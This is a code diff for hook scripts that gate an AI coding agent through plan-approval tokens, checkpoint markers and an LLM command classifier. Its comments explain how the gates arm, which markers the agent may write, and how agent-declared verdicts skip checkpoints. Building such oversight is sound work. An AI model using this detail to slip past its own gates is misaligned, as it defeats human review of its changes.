+          printf '%s\t\t%s\n' "nonsrc_write" "interpreter_install_deploy"
+          return 0
+          ;;
         classify-correction.mjs)
           # FU-6: LLM-classifier correction helper. Writes only inside
           # <project>/.episodic-memory/classifier-overrides.jsonl AFTER the

--- a/hooks/lib/command-classifier.sh
+++ b/hooks/lib/command-classifier.sh
@@ -1311,7 +1311,7 @@ _classify_segment() {
           return 0
         fi
         # Parse --root <ARG> from remaining tokens
-        local _helper_root="" _has_touch=0 _has_rm=0
+        local _helper_root="" _has_touch=0 _has_rm=0 _has_approve=0
         local _k=$((_next_idx+1))
         while [ $_k -lt ${#TOKS[@]} ]; do
           case "${TOKS[$_k]}" in
@@ -1321,8 +1321,9 @@ _classify_segment() {
                 _helper_root="${TOKS[$_k]}"
               fi
               ;;
-            --touch) _has_touch=1 ;;
-            --rm)    _has_rm=1 ;;
+            --touch)   _has_touch=1 ;;
+            --rm)      _has_rm=1 ;;
+            --approve) _has_approve=1 ;;
           esac
           _k=$((_k+1))
         done
@@ -1330,21 +1331,30 @@ _classify_segment() {
         local _env_sid="${CLAUDE_CODE_SESSION_ID:-}"
         # Compose target. If --root or sid is missing, emit marker_write
         # with empty TARGET; gate's existing equality check will fail and
-        # block — helper would also fail-closed anyway.
+        # block — helper would also fail-closed anyway. For ALL three actions
+        # the TARGET is the per-session PENDING path: --touch/--rm operate on
+        # it directly, and --approve removes it (while creating .plan-approved
+        # internally). Keying on the pending basename lets plan-gate.sh allow
+        # --approve while a plan-pending marker exists for this session.
         local _target=""
         if [ -n "$_helper_root" ] && [ -n "$_env_sid" ]; then
           _target="${_helper_root}/.checkpoints/.plan-approval-pending.${_env_sid}"
         fi
-        local _reason="plan_marker_helper"
-        if [ $_has_touch -eq 1 ] && [ $_has_rm -eq 1 ]; then
+        # Exactly-one-action mutex (matches helper main()): >1 → block.
+        local _action_count=$((_has_touch + _has_rm + _has_approve))
+        if [ $_action_count -gt 1 ]; then
           # Mutex violation in args — helper will exit 6 anyway. Classify as
           # unsafe_complex; gate blocks.
           printf '%s\t\t%s\n' "unsafe_complex" "plan_marker_mutex_violation"
           return 0
-        elif [ $_has_touch -eq 1 ]; then
+        fi
+        local _reason="plan_marker_helper"
+        if [ $_has_touch -eq 1 ]; then
           _reason="plan_marker_touch"
         elif [ $_has_rm -eq 1 ]; then
           _reason="plan_marker_rm"
+        elif [ $_has_approve -eq 1 ]; then
+          _reason="plan_marker_approve"
         else
           # Missing action — helper will exit 6. Classify as unsafe_complex.
           printf '%s\t\t%s\n' "unsafe_complex" "plan_marker_missing_action"

--- a/hooks/lib/marker-paths.sh
+++ b/hooks/lib/marker-paths.sh
@@ -12,13 +12,20 @@
 # `.checkpoints/` first, fallback `.claude/` second) until the legacy
 # branch is removed in a follow-up commit.
 #
-# Six markers in migration scope:
+# Seven markers in migration scope:
 #
 #   Marker name                    | Set membership
 #   ---                            | ---
 #   .checkpoint-required           | TASK_SIGNAL + CHECKPOINT_CLEANUP
 #   .post-checkpoint-required      | TASK_SIGNAL + CHECKPOINT_CLEANUP
 #   .plan-approval-pending         | TASK_SIGNAL only (not cleared by push)
+#   .plan-approved                 | ALL_MIGRATED only — own-session cleanup
+#                                    (approval token; consumed at arm, one-shot).
+#                                    Deliberately NOT in CHECKPOINT_CLEANUP: the
+#                                    push sweep globs all sessions' suffixed
+#                                    forms, which would delete a CONCURRENT
+#                                    session's live token and skip its
+#                                    pre-checkpoint (review F1).
 #   .pre-checkpoint-done           | CHECKPOINT_CLEANUP only
 #   .post-checkpoint-done          | CHECKPOINT_CLEANUP only
 #   .session-baseline              | BASELINE only
@@ -44,8 +51,9 @@
 #   CHECKPOINT_CLEANUP_MARKERS  4 markers — push-gate clears on successful
 #                               push (Codex round-1 F2: must sweep BOTH
 #                               .checkpoints/ AND .claude/ during burn-in).
-#                               Mirrors prior checkpoint-gate.sh:200.
-#   ALL_MIGRATED_MARKERS        6 names — full migration scope used by
+#                               Mirrors prior checkpoint-gate.sh:200. (.plan-approved
+#                               intentionally excluded — see review F1.)
+#   ALL_MIGRATED_MARKERS        7 names — full migration scope used by
 #                               tests, sweep tools, and SessionEnd cleanup.
 #
 # Codex round-2 ACCEPT (episode 20260509-044331-...-bc1c) per plan v3 §B.
@@ -64,9 +72,12 @@ TASK_SIGNAL_MARKERS=(
 )
 
 # Push-gate cleanup class — markers cleared on a successful push that has
-# satisfied the post-checkpoint. .plan-approval-pending is intentionally
-# NOT here (its lifecycle is plan-gate's marker_write allowance, not
-# checkpoint cleanup). Mirrors the prior checkpoint-gate.sh:200 list.
+# satisfied the post-checkpoint. The push sweep glob-deletes ALL sessions'
+# suffixed forms — convergence semantics for the quartet. .plan-approval-pending
+# is NOT here (plan-gate owns it). .plan-approved is NOT here either (review F1):
+# it is the per-session authorization-to-arm token, so cross-session glob-
+# deletion would skip a concurrent session's pre-checkpoint. It is consumed at
+# arm in the normal flow; own-session orphans are cleaned at SessionEnd.
 CHECKPOINT_CLEANUP_MARKERS=(
   ".checkpoint-required"
   ".pre-checkpoint-done"
@@ -74,12 +85,13 @@ CHECKPOINT_CLEANUP_MARKERS=(
   ".post-checkpoint-done"
 )
 
-# Full migration scope = task-signal + done markers + baseline = 6 names.
-# Used by sweep tools and tests to validate completeness.
+# Full migration scope = task-signal + approval token + done markers +
+# baseline = 7 names. Used by sweep tools and tests to validate completeness.
 ALL_MIGRATED_MARKERS=(
   ".checkpoint-required"
   ".post-checkpoint-required"
   ".plan-approval-pending"
+  ".plan-approved"
   ".pre-checkpoint-done"
   ".post-checkpoint-done"
   ".session-baseline"
@@ -187,6 +199,20 @@ plan_marker_basename_matches() {
 plan_marker_basename_for_session() {
   printf '.plan-approval-pending.%s' "$1"
 }
+
+# ---------------------------------------------------------------------------
+# Checkpoint-planapproval redesign — `.plan-approved` approval token (shell
+# parity for scripts/lib/marker-paths.mjs PLAN_APPROVED_LEGACY_BASENAME).
+#
+# Per-session form `.plan-approved.<sid>` uses the generic namespaced-marker
+# helpers below (namespaced_marker_basename_for_session /
+# namespaced_marker_basename_matches / any_namespaced_marker_exists).
+# Created by plan-marker.mjs --approve; consumed (one-shot) by
+# checkpoint-gate.sh's _arm_checkpoint_required_if_missing. A forged/wrong-root
+# `.plan-approved` is INERT (see .mjs note) — not plumbed into wrong-root
+# detectors.
+# ---------------------------------------------------------------------------
+readonly PLAN_APPROVED_LEGACY_BASENAME='.plan-approved'
 
 # any_plan_marker_exists <repo-root>
 # True if ANY plan-approval marker (legacy suffix-less OR any suffixed form)

--- a/scripts/classifier-marker.mjs
+++ b/scripts/classifier-marker.mjs
@@ -8,8 +8,10 @@
  * verdict here. A PreToolUse shell hook reads the marker and gates.
  *
  * Mode: --read
- *   Args: --project-root <abs> --caller-cwd <abs> --command <text>
- *         --session-id <string>
+ *   Args: --project-root <abs> --caller-cwd <abs> --session-id <string>
+ *         and ONE classification subject:
+ *           --command <text> | --command-file <path>  (a Bash command), OR
+ *           --target-path <path>                       (a Write/Edit target)
  *   Emits the cached JSON verdict on stdout, exit 0; exits 1 if no marker
  *   exists or marker is stale/invalid.
  *
@@ -17,6 +19,15 @@
  *   Args: above + --label <L> --confidence <N> --reason <S>
  *   Atomically writes to <project>/.checkpoints/classify/<sha>.json.
  *   Exits 0 on success; exits 2 on input/binding error.
+ *
+ * Path-verdict subject (PR-B2 §11/§15-C2, #351): --target-path classifies a
+ * Write/Edit TARGET path rather than a command. The Edit/Write pre-checkpoint
+ * arming was a pure path heuristic — any in-repo write armed — which over-arms
+ * on the plan/scratch/doc files cross-tool harnesses stage in-project. A path
+ * verdict lets the agent declare a specific target nonsrc_write/read_only and
+ * skip the arm, symmetric with the Bash command verdict. The path tuple is
+ * namespace-segregated from command tuples (see buildPathTuple) so the two
+ * key spaces can never collide.
  *
  * Mode: --vacuum
  *   Args: --project-root <abs> [--max-age-days N (default 30)]
@@ -204,6 +215,100 @@ function cacheKey(tuple) {
   const sorted = {}
   for (const k of Object.keys(tuple).sort()) sorted[k] = tuple[k]
   return crypto.createHash('sha256').update(JSON.stringify(sorted)).digest('hex')
+}
+
+// ----- Path-verdict tuple (PR-B2 §11/§15-C2): a Write/Edit TARGET path -----
+
+// canonicalizeTargetPath — resolve a write target to a canonical absolute path
+// BOUND to project_root (codex R2 C2(e), MANDATORY). The target frequently does
+// NOT exist yet (a Write creates it), so we must NOT realpathSync.native(target)
+// — that throws ENOENT. Instead walk up to the nearest EXISTING ancestor,
+// realpath THAT (native, resolving any symlinked parent), reject an escape
+// outside project_root, then re-append the unresolved trailing segments
+// lexically. This makes write-side and read-side canonicalization identical for
+// a not-yet-created path so the cache key matches on the retry.
+//
+// lstatSync (not statSync) is used during the walk so a broken-symlink leaf is
+// treated as "existing surface to resolve" rather than walked through.
+function canonicalizeTargetPath(targetArg, callerCwd, projectRoot) {
+  const abs = path.resolve(callerCwd, targetArg)
+  const trailing = []
+  let cur = abs
+  while (true) {
+    try {
+      fs.lstatSync(cur)
+      break
+    } catch (e) {
+      if (e.code !== 'ENOENT') throw e
+      const parent = path.dirname(cur)
+      if (parent === cur) break   // reached filesystem root; nothing on path exists
+      trailing.unshift(path.basename(cur))
+      cur = parent
+    }
+  }
+  let realAncestor
+  try { realAncestor = fs.realpathSync.native(cur) }
+  catch { realAncestor = cur }
+
+  // The existing ancestor MUST canonicalize INSIDE project_root. A symlinked
+  // ancestor escaping the repo — or an explicitly off-repo target — is refused:
+  // path verdicts are only meaningful for in-repo write targets (the gate's
+  // repo-source heuristic already excludes off-repo writes), and a key that
+  // resolves outside the repo must never be honored as a downgrade. Compare
+  // against the native-canonical project root so realpathSync (used at the
+  // call site) vs realpathSync.native can't drift (macOS /var→/private/var).
+  let projectRootNative
+  try { projectRootNative = fs.realpathSync.native(projectRoot) }
+  catch { projectRootNative = projectRoot }
+  if (!isUnder(realAncestor, projectRootNative)) {
+    die(2, `--target-path resolves outside project root: ${realAncestor} not under ${projectRootNative}`)
+  }
+
+  return trailing.length ? path.join(realAncestor, ...trailing) : realAncestor
+}
+
+// buildPathTuple — the path-verdict cache tuple. Namespace-segregated from
+// command tuples (buildTuple) TWO ways, either of which alone guarantees the
+// sha can never collide with a command key: (1) a `_kind: 'path_write'`
+// discriminator field that command tuples never carry, and (2) the canonical
+// path stored under a `write:`-prefixed `target_path` field (the literal
+// `write:<canonical-path>` namespace from §14-F4/§15-C2). The field-name set
+// differs from buildTuple's, so the sorted-JSON the sha is taken over is
+// structurally distinct.
+function buildPathTuple({ targetCanonical, projectRoot, sessionId }) {
+  return {
+    _kind: 'path_write',
+    project_root_canonical: projectRoot,
+    target_path: `write:${targetCanonical}`,
+    session_id: sessionId,
+    classifier_policy_version: CLASSIFIER_POLICY_VERSION,
+    normalized_command_version: NORMALIZED_COMMAND_VERSION
+  }
+}
+
+// resolveInputTuple — resolve the classification subject for --read/--write:
+// exactly one of {--command|--command-file} (a Bash command) OR --target-path
+// (a Write/Edit target). Returns the cache tuple, its sha, and the value to
+// store in the marker's informational `command_normalized` field.
+function resolveInputTuple(argv, { projectRoot, callerCwd, sessionId }) {
+  const targetPath = flag(argv, '--target-path')
+  const inlineCmd = flag(argv, '--command')
+  const cmdFile = flag(argv, '--command-file')
+
+  if (targetPath !== undefined) {
+    if (inlineCmd !== undefined || cmdFile !== undefined) {
+      die(2, '--target-path is mutually exclusive with --command/--command-file')
+    }
+    if (targetPath === '') die(2, '--target-path must be non-empty')
+    const canonical = canonicalizeTargetPath(targetPath, callerCwd, projectRoot)
+    const tuple = buildPathTuple({ targetCanonical: canonical, projectRoot, sessionId })
+    return { tuple, sha: cacheKey(tuple), payloadNorm: `write:${canonical}` }
+  }
+
+  const command = resolveCommandArg(argv)
+  if (command === undefined) die(2, '--command, --command-file, or --target-path required')
+  const tuple = buildTuple({ command, projectRoot, callerCwd, sessionId })
+  return { tuple, sha: cacheKey(tuple), payloadNorm: tuple.normalized_command }
 }
 
 // ----- Path-component hardening (lstat each ancestor, refuse symlinks) -----
@@ -439,16 +544,21 @@ function emit(obj) {
 function mainRead(argv) {
   const projectRootArg = flag(argv, '--project-root')
   const callerCwd = flag(argv, '--caller-cwd')
-  const command = resolveCommandArg(argv)
   const sessionId = flag(argv, '--session-id')
 
   if (!projectRootArg) die(2, '--project-root required')
   if (!callerCwd) die(2, '--caller-cwd required')
-  if (command === undefined) die(2, '--command or --command-file required')
   if (!sessionId) die(2, '--session-id required')
   if (!SESSION_ID_RE.test(sessionId)) die(2, `--session-id "${sessionId}" does not match ${SESSION_ID_RE}`)
 
   const projectRoot = realpathOrSame(path.resolve(projectRootArg))
+
+  // Resolve + validate the classification subject BEFORE the store-dir check.
+  // Subject misuse (mutual-exclusion, oversize --command-file, off-repo
+  // --target-path) is a usage error (exit 2) that must take precedence over a
+  // missing-store cache miss (exit 1) — otherwise a fresh repo with no
+  // .checkpoints/ would mask the misuse as a benign miss.
+  const { tuple, sha } = resolveInputTuple(argv, { projectRoot, callerCwd, sessionId })
 
   // Codex BLOCKER #1 fix: --read MUST apply the same ancestor validation as
   // --write. Symlinked .checkpoints/ would otherwise let a read escape to an
@@ -461,8 +571,6 @@ function mainRead(argv) {
   }
   const classifyDir = v.classifyDir
 
-  const tuple = buildTuple({ command, projectRoot, callerCwd, sessionId })
-  const sha = cacheKey(tuple)
   const result = readMarker(classifyDir, sha, tuple, sessionId)
 
   if (result.status === 'hit') {
@@ -490,7 +598,6 @@ function mainRead(argv) {
 function mainWrite(argv) {
   const projectRootArg = flag(argv, '--project-root')
   const callerCwd = flag(argv, '--caller-cwd')
-  const command = resolveCommandArg(argv)
   const sessionId = flag(argv, '--session-id')
   const label = flag(argv, '--label')
   const confidenceStr = flag(argv, '--confidence')
@@ -498,7 +605,6 @@ function mainWrite(argv) {
 
   if (!projectRootArg) die(2, '--project-root required')
   if (!callerCwd) die(2, '--caller-cwd required')
-  if (command === undefined) die(2, '--command or --command-file required')
   if (!sessionId) die(2, '--session-id required')
   if (!label) die(2, '--label required')
   if (!LABELS.has(label)) die(2, `invalid --label "${label}" (allowed: ${[...LABELS].join(', ')})`)
@@ -525,15 +631,17 @@ function mainWrite(argv) {
     die(2, `--project-root (${projectRoot}) != resolveRepoRoot(process.cwd()) (${resolvedFromCwd}); refusing cross-repo write`)
   }
 
+  // Resolve + validate the subject BEFORE creating the store dir, so a misuse
+  // (mutual-exclusion, oversize, off-repo --target-path) exits 2 without
+  // leaving an empty .checkpoints/classify/ behind.
+  const { tuple, sha, payloadNorm } = resolveInputTuple(argv, { projectRoot, callerCwd, sessionId })
   const { classifyDir } = validateMarkerStoreDir(projectRoot, { allowCreate: true, missingIsMiss: false })
-  const tuple = buildTuple({ command, projectRoot, callerCwd, sessionId })
-  const sha = cacheKey(tuple)
   const nowIso = new Date().toISOString()
   const payload = {
     label,
     confidence,
     reason: String(reasonRaw).slice(0, REASON_MAX),
-    command_normalized: tuple.normalized_command,
+    command_normalized: payloadNorm,
     _project_root_canonical: projectRoot,
     _cache_key: sha,
     _session_id: sessionId,

--- a/scripts/classifier-marker.mjs
+++ b/scripts/classifier-marker.mjs
@@ -67,6 +67,7 @@ import { resolveRepoRoot } from './lib/local-dir.mjs'
 
 const LABELS = new Set([
   'read_only',
+  'nonsrc_write',
   'shared_write',
   'marker_write',
   'push_or_pr_create',
@@ -75,7 +76,10 @@ const LABELS = new Set([
 
 // Path-versioning fields. Bumping either makes ALL existing markers
 // unreachable via their old paths and forces re-classification.
-const CLASSIFIER_POLICY_VERSION = 1
+// Bumped 1→2 (PR-B2, #351): the `nonsrc_write` label is a taxonomy change.
+// Stale markers carrying the old policy version become unreachable and force
+// re-classification (handled at the version-mismatch check ~L380; --vacuum reaps).
+const CLASSIFIER_POLICY_VERSION = 2
 const NORMALIZED_COMMAND_VERSION = 1
 const MARKER_SCHEMA_VERSION = 2
 

--- a/scripts/classifier-override-persist.mjs
+++ b/scripts/classifier-override-persist.mjs
@@ -14,7 +14,7 @@
  *     --project-root <abs-path> \
  *     --caller-cwd  <abs-path> \
  *     --command     "<command text>" \
- *     --label       <read_only|shared_write|marker_write|push_or_pr_create|unsafe_complex> \
+ *     --label       <read_only|nonsrc_write|shared_write|marker_write|push_or_pr_create|unsafe_complex> \
  *     --confidence  <0..1> \
  *     --source-tag  <agent-marker-autopersist|agent-legacy-autopersist>
  *     [--reason     "<note>"]

--- a/scripts/classify-correction.mjs
+++ b/scripts/classify-correction.mjs
@@ -11,7 +11,7 @@
  *     --project-root <abs-path> \
  *     --caller-cwd  <abs-path> \
  *     --command     "<command text>" \
- *     --label       <read_only|shared_write|marker_write|push_or_pr_create|unsafe_complex> \
+ *     --label       <read_only|nonsrc_write|shared_write|marker_write|push_or_pr_create|unsafe_complex> \
  *     [--reason     "<note>"] \
  *     [--allow-non-git]
  *

--- a/scripts/em-session-end-prompt.mjs
+++ b/scripts/em-session-end-prompt.mjs
@@ -25,6 +25,7 @@ import {
   legacyMarkerPath,
   namespacedMarkerBasenameForSession,
   CHECKPOINT_QUARTET,
+  PLAN_APPROVED_LEGACY_BASENAME,
 } from './lib/marker-paths.mjs'
 import { validateSessionId } from './lib/session-id.mjs'
 
@@ -144,10 +145,16 @@ for (const marker of ALL_MIGRATED_MARKERS) {
   // form. NEVER delete other sessions' suffixed forms (cross-session
   // safety — concurrent session A's quartet markers preserved at B's
   // SessionEnd, mirrors plan-marker F12 cross-session contract).
+  //
+  // Review F2: `.plan-approved.<sid>` (the approval token) gets the SAME
+  // own-session suffixed cleanup as the quartet — without it, a session that
+  // approves but ends before arming leaks an orphan token (it is deliberately
+  // excluded from the push sweep, so SessionEnd is its only own-session reaper).
   for (const p of bothMarkerPaths(repoRoot, marker)) {
     try { fs.unlinkSync(p) } catch {}
   }
-  if (CHECKPOINT_QUARTET.includes(marker) && validateSessionId(sessionEndSid)) {
+  if ((CHECKPOINT_QUARTET.includes(marker) || marker === PLAN_APPROVED_LEGACY_BASENAME)
+      && validateSessionId(sessionEndSid)) {
     const ownBasename = namespacedMarkerBasenameForSession(marker, sessionEndSid)
     for (const p of [
       primaryMarkerPath(repoRoot, ownBasename),

--- a/scripts/lib/classifier-cache.mjs
+++ b/scripts/lib/classifier-cache.mjs
@@ -26,6 +26,7 @@ import crypto from 'crypto'
 
 export const LABELS = new Set([
   'read_only',
+  'nonsrc_write',
   'shared_write',
   'marker_write',
   'push_or_pr_create',

--- a/scripts/lib/marker-paths.mjs
+++ b/scripts/lib/marker-paths.mjs
@@ -11,13 +11,23 @@
  * `.checkpoints/` first, fallback `.claude/` second) until the legacy
  * branch is removed in a follow-up commit.
  *
- * Six markers in migration scope:
+ * Seven markers in migration scope:
  *
  *   Marker name                    | Set membership
  *   ---                            | ---
  *   .checkpoint-required           | TASK_SIGNAL + CHECKPOINT_CLEANUP
  *   .post-checkpoint-required      | TASK_SIGNAL + CHECKPOINT_CLEANUP
  *   .plan-approval-pending         | TASK_SIGNAL only (not cleared by push)
+ *   .plan-approved                 | ALL_MIGRATED only — own-session cleanup
+ *                                    (approval token; created by plan-marker
+ *                                    --approve, consumed at checkpoint-gate arm,
+ *                                    one-shot). Deliberately NOT in
+ *                                    CHECKPOINT_CLEANUP: the push sweep globs all
+ *                                    sessions' suffixed forms, which would delete
+ *                                    a CONCURRENT session's live token and skip
+ *                                    its pre-checkpoint (review F1). It is
+ *                                    consumed at arm in the normal flow; orphans
+ *                                    are own-session-cleaned at SessionEnd.
  *   .pre-checkpoint-done           | CHECKPOINT_CLEANUP only
  *   .post-checkpoint-done          | CHECKPOINT_CLEANUP only
  *   .session-baseline              | BASELINE only
@@ -39,8 +49,9 @@
  *   CHECKPOINT_CLEANUP_MARKERS  4 markers — push-gate clears on successful
  *                               push (Codex round-1 F2: must sweep BOTH
  *                               .checkpoints/ AND .claude/ during burn-in).
- *                               Mirrors prior checkpoint-gate.sh:200.
- *   ALL_MIGRATED_MARKERS        6 names — full migration scope used by
+ *                               Mirrors prior checkpoint-gate.sh:200. (.plan-approved
+ *                               is intentionally excluded — see review F1.)
+ *   ALL_MIGRATED_MARKERS        7 names — full migration scope used by
  *                               tests, sweep tools, and SessionEnd cleanup.
  *
  * Codex round-2 ACCEPT (episode 20260509-044331-...-bc1c) per plan v3 §B.
@@ -62,9 +73,13 @@ export const TASK_SIGNAL_MARKERS = [
 ]
 
 // Push-gate cleanup class — markers cleared on a successful push that has
-// satisfied the post-checkpoint. .plan-approval-pending is intentionally
-// NOT here (its lifecycle is plan-gate's marker_write allowance, not
-// checkpoint cleanup). Mirrors the prior checkpoint-gate.sh:200 list.
+// satisfied the post-checkpoint. The push sweep glob-deletes ALL sessions'
+// suffixed forms (`<marker>.*`) — the convergence semantics for the quartet.
+// .plan-approval-pending is NOT here (plan-gate owns its lifecycle). .plan-approved
+// is NOT here either (review F1): it is the per-session authorization-to-arm
+// token, so cross-session glob-deletion would skip a concurrent session's
+// pre-checkpoint. It is consumed at arm in the normal flow; own-session orphans
+// are cleaned at SessionEnd via ALL_MIGRATED_MARKERS.
 export const CHECKPOINT_CLEANUP_MARKERS = [
   '.checkpoint-required',
   '.pre-checkpoint-done',
@@ -72,12 +87,13 @@ export const CHECKPOINT_CLEANUP_MARKERS = [
   '.post-checkpoint-done'
 ]
 
-// Full migration scope = task-signal + done markers + baseline = 6 names.
-// Used by sweep tools and tests to validate completeness.
+// Full migration scope = task-signal + approval token + done markers +
+// baseline = 7 names. Used by sweep tools and tests to validate completeness.
 export const ALL_MIGRATED_MARKERS = [
   '.checkpoint-required',
   '.post-checkpoint-required',
   '.plan-approval-pending',
+  '.plan-approved',
   '.pre-checkpoint-done',
   '.post-checkpoint-done',
   '.session-baseline'
@@ -180,6 +196,31 @@ export function planMarkerBasenameMatches(basename) {
 export function planMarkerBasenameForSession(sid) {
   return PLAN_MARKER_BASENAME_TEMPLATE.replace('{sid}', sid)
 }
+
+// ---------------------------------------------------------------------------
+// Checkpoint-planapproval redesign — `.plan-approved` approval token.
+//
+// Lifecycle: plan-marker.mjs --approve atomically creates
+// `.plan-approved.<sid>` (and removes `.plan-approval-pending.<sid>`).
+// checkpoint-gate.sh's _arm_checkpoint_required_if_missing arms
+// `.checkpoint-required` ONLY when `.plan-approved.<sid>` exists, and CONSUMES
+// (deletes) it on arm — one-shot, so an approval can't leak into a later
+// planning phase. plan-marker.mjs --touch stale-clears the EXACT
+// `.plan-approved.<sid>` (no glob — prefix-collision safe).
+//
+// Per-session form `.plan-approved.<sid>` uses the generic namespaced-marker
+// helpers (namespacedMarkerBasenameForSession / namespacedMarkerBasenameMatches
+// / anyNamespacedMarkerExists). Shell parity: PLAN_APPROVED_LEGACY_BASENAME in
+// hooks/lib/marker-paths.sh.
+//
+// NOTE: a forged or wrong-root `.plan-approved` is INERT — arm only reads
+// `.plan-approved.<sid>` at the repo root, and a forged token only opts the
+// session INTO the checkpoint lifecycle (more friction), never bypassing a
+// gate. So it is intentionally NOT plumbed into the wrong-root / relative-
+// marker detectors (unlike the agent-writable quartet/plan-pending markers).
+// ---------------------------------------------------------------------------
+
+export const PLAN_APPROVED_LEGACY_BASENAME = '.plan-approved'
 
 // ---------------------------------------------------------------------------
 // #279 fix — per-session .preflight-done marker contract.

--- a/scripts/llm-classify.mjs
+++ b/scripts/llm-classify.mjs
@@ -12,7 +12,7 @@
  *   { label, confidence, reason, project_root_used, model_used,
  *     latency_ms, fail_mode_applied }
  *
- * label ∈ { read_only, shared_write, marker_write, push_or_pr_create,
+ * label ∈ { read_only, nonsrc_write, shared_write, marker_write, push_or_pr_create,
  *           unsafe_complex }
  *
  * Cwd binding: this script MUST be invoked via `(cd "$REPO_ROOT" && node ...)`
@@ -32,6 +32,7 @@ import { loadConfig } from './classifier-config-loader.mjs'
 
 const LABELS = new Set([
   'read_only',
+  'nonsrc_write',
   'shared_write',
   'marker_write',
   'push_or_pr_create',
@@ -71,7 +72,10 @@ async function classifyOnce({ cfg, projectRoot, callerCwd, command, abortSignal 
     '',
     'Allowed labels:',
     ' - read_only: command only reads files / queries state; no writes outside /tmp or stdout.',
-    ' - shared_write: writes/modifies project files, indexes, databases, or shared state.',
+    ' - nonsrc_write: writes, but definitely NOT repo source — .git internals (git commit/add),',
+    '     package installs (npm/yarn install), mkdir/rmdir, episode-store writes, redirect to /tmp.',
+    ' - shared_write: writes/modifies repo-source project files, indexes, databases, or shared state,',
+    '     OR cannot tell whether the target is repo source.',
     ' - marker_write: writes ONLY to .checkpoints/.* or .claude/.* marker paths.',
     ' - push_or_pr_create: git push, gh pr create, or equivalent remote-publish.',
     ' - unsafe_complex: cannot determine safely (variable expansion, dynamic eval, untrusted input).',

--- a/scripts/plan-marker.mjs
+++ b/scripts/plan-marker.mjs
@@ -16,8 +16,9 @@
  *                                          planMarkerBasenameForSession
  *
  * Usage:
- *   node ~/.episodic-memory/scripts/plan-marker.mjs --touch --root <abs>
- *   node ~/.episodic-memory/scripts/plan-marker.mjs --rm    --root <abs>
+ *   node ~/.episodic-memory/scripts/plan-marker.mjs --touch   --root <abs>
+ *   node ~/.episodic-memory/scripts/plan-marker.mjs --rm      --root <abs>
+ *   node ~/.episodic-memory/scripts/plan-marker.mjs --approve --root <abs>
  *
  * Session-id source: process.env.CLAUDE_CODE_SESSION_ID (probed exposed
  * to Bash subprocesses 2026-05-13). NO file-based source-of-truth (the
@@ -27,7 +28,10 @@
  * --touch:
  *   1. Read CLAUDE_CODE_SESSION_ID; FAIL exit 8 if empty/unset/invalid
  *   2. validateRoot(--root)
- *   3. Atomic write empty file at <root>/.checkpoints/.plan-approval-pending.<sid>
+ *   3. Stale-clear: rm the EXACT `.plan-approved.<sid>` at both roots (a new
+ *      pending plan supersedes any prior approval for this session; no glob —
+ *      prefix-collision safe)
+ *   4. Atomic write empty file at <root>/.checkpoints/.plan-approval-pending.<sid>
  *
  * --rm (F3 narrowed semantics, per codex r1 F1 fold):
  *   1. Same env + root validation
@@ -36,6 +40,17 @@
  *      reserved for burn-in compat from sessions still using the pre-v6
  *      Rule 8 fallback. Legacy is read-only-during-burn-in; cleared only
  *      by SessionStart orphan sweep (em-recall.mjs).
+ *   NOTE: bare `--rm` no longer implies approval — it only clears pending.
+ *   The ONLY sanctioned approval is --approve (planapproval redesign).
+ *
+ * --approve (planapproval redesign — the ONLY sanctioned approval):
+ *   1. Same env + root validation
+ *   2. Atomic write empty file at `.plan-approved.<sid>` (the approval token
+ *      that checkpoint-gate's arm consumes — one-shot)
+ *   3. rm `.plan-approval-pending.<sid>` at primary + legacy roots
+ *   Ordering is fail-safe toward "plan still pending": create token first,
+ *   then clear pending. checkpoint-gate arms `.checkpoint-required` ONLY when
+ *   `.plan-approved.<sid>` exists, and deletes it on arm.
  *
  * Exit codes (matches preflight-marker-write convention):
  *   0 — success; stdout is JSON {status:"ok", path|removed, sid}
@@ -55,6 +70,8 @@ import {
   primaryMarkerPath,
   legacyMarkerPath,
   planMarkerBasenameForSession,
+  namespacedMarkerBasenameForSession,
+  PLAN_APPROVED_LEGACY_BASENAME,
 } from './lib/marker-paths.mjs'
 import { SESSION_ID_RE, validateSessionId } from './lib/session-id.mjs'
 import { validateRoot, RootValidationError } from './lib/marker-root-validation.mjs'
@@ -65,7 +82,7 @@ function fail(code, message) {
 }
 
 function parseArgs(argv) {
-  const args = { root: null, touch: false, rm: false }
+  const args = { root: null, touch: false, rm: false, approve: false }
   for (let i = 2; i < argv.length; i++) {
     const a = argv[i]
     if (a === '--root') {
@@ -74,9 +91,15 @@ function parseArgs(argv) {
       args.touch = true
     } else if (a === '--rm') {
       args.rm = true
+    } else if (a === '--approve') {
+      args.approve = true
     } else if (a === '--help' || a === '-h') {
       process.stdout.write(
-        'Usage: plan-marker.mjs (--touch | --rm) --root <abs>\n' +
+        'Usage: plan-marker.mjs (--touch | --rm | --approve) --root <abs>\n' +
+        '  --touch:   arm the pending plan-approval marker (stale-clears the approval token)\n' +
+        '  --rm:      remove the pending plan-approval marker (own session only)\n' +
+        '  --approve: atomically create the approval token AND remove the pending\n' +
+        '             marker — the ONLY sanctioned approval.\n' +
         '  Session-id read from CLAUDE_CODE_SESSION_ID env var.\n' +
         '  Exit codes: 0 ok / 3 fs / 4 root-missing / 5 root-invalid / 6 mutex / 8 sid-invalid\n'
       )
@@ -108,12 +131,12 @@ function validateRootOrExit(rootArg) {
   }
 }
 
-function actionTouch(canonicalRoot, sid) {
-  ensurePrimaryDir(canonicalRoot)
-  const basename = planMarkerBasenameForSession(sid)
+// Atomic temp+rename write of an empty file at <root>/.checkpoints/<basename>.
+// rename(2) is atomic on the same filesystem; SIGINT/SIGTERM cleanup prevents
+// temp orphans. Mirrors checkpoint-marker.mjs atomicWriteEmpty. On failure,
+// calls fail(3) (process exits). Returns the final path on success.
+function atomicWriteEmpty(canonicalRoot, basename) {
   const finalPath = primaryMarkerPath(canonicalRoot, basename)
-
-  // Unique temp name in same dir → rename(2) atomic on same filesystem.
   const hr = process.hrtime.bigint().toString()
   const tempName = `.${basename}.${process.pid}.${hr}.tmp`
   const tempPath = path.join(canonicalRoot, '.checkpoints', tempName)
@@ -136,21 +159,18 @@ function actionTouch(canonicalRoot, sid) {
     try { fs.unlinkSync(tempPath) } catch { /* best-effort */ }
     fail(3, `WRITE_FAILED: ${e.message}`)
   }
-
-  process.stdout.write(JSON.stringify({ status: 'ok', path: finalPath, sid }) + '\n')
-  process.exit(0)
+  return finalPath
 }
 
-function actionRm(canonicalRoot, sid) {
-  // F3 narrowed: rm ONLY the SUFFIXED form at primary + legacy roots.
-  // Bare suffix-less `.plan-approval-pending` is never touched — its
-  // lifecycle is owned by SessionStart orphan-sweep during burn-in.
-  const basename = planMarkerBasenameForSession(sid)
-  const primary = primaryMarkerPath(canonicalRoot, basename)
